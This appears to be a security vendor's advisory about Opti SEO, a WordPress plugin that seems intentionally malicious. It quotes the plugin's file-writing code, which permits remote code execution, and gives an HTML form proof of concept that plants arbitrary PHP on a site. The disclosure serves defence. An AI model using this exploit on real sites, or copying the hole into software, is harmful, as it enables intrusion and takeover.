Back in October we discussed our spotting a probe for usage of a group of intentionally malicious plugins that someone had created several years ago and last month we discussed another plugin that looks to be from the set of plugins. We recently have been seeing a lot of requests probing for usage of those plugins, though usually probing for only one of them instead of large group of them. We also recently had a request for yet another plugin that looks to be part of that set, Opti SEO, which like the others contains a remote code execution (RCE) vulnerability.

In the file /install.php the contents of the POST input “newins” is placed in the file /installed.php, which due to its .php extension will allow PHP code placed in the file to be executed when requested:

2
3
4
5
6
7
8
9

session_start();
$opseoinstall = $_POST['newins'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/option-seo/installed.php', 'w');
$opseoinstall = str_replace('\\', '', $opseoinstall);
$opseoinstall = htmlentities($opseoinstall);
fwrite($fp, html_entity_decode($opseoinstall));
fclose($fp);
echo $opseoinstall;

As with other plugins where we see exploitation attempts we are adding this vulnerability to the free data that comes with our service’s companion plugin, so you can check if you are using any of this set of plugins by simply installing that plugin.

Proof of Concept

The following proof of concept will place the specified PHP code in to the file installed.php in the directory /wp-content/plugins/option-seo/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/option-seo/install.php" method="POST">
<input type="hidden" name="newins" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>